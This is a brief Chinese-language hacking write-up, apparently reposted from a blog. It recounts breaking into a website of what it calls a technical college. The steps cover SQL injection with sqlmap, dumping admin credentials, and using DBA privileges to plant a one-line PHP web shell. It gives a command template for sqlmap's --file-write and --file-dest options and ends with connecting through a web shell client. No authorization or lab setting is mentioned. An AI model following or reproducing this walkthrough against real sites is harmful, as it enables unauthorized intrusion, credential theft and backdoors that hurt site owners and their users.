这是我们的目标,某一技术学院,这是一个注入点
上sqlmap
跑出了管理账号密码
扫后台
没有找到,注入就相当鸡肋了
换换其他思路
dba权限,想到了直接写入
找找路径之类的
找到了,运气相当的好
直接利用sqlmap写入一句话
语句*sqlmap,py -u “url” –file-write=”要写入本地文件路径”(注意为/) –file-dest=”网站路径/1.php”(注意为/)
访问空白,成功了,菜刀连接
shell到手。。。
原文:http://www.cnblogs.com/hack-moumou/p/5903876.html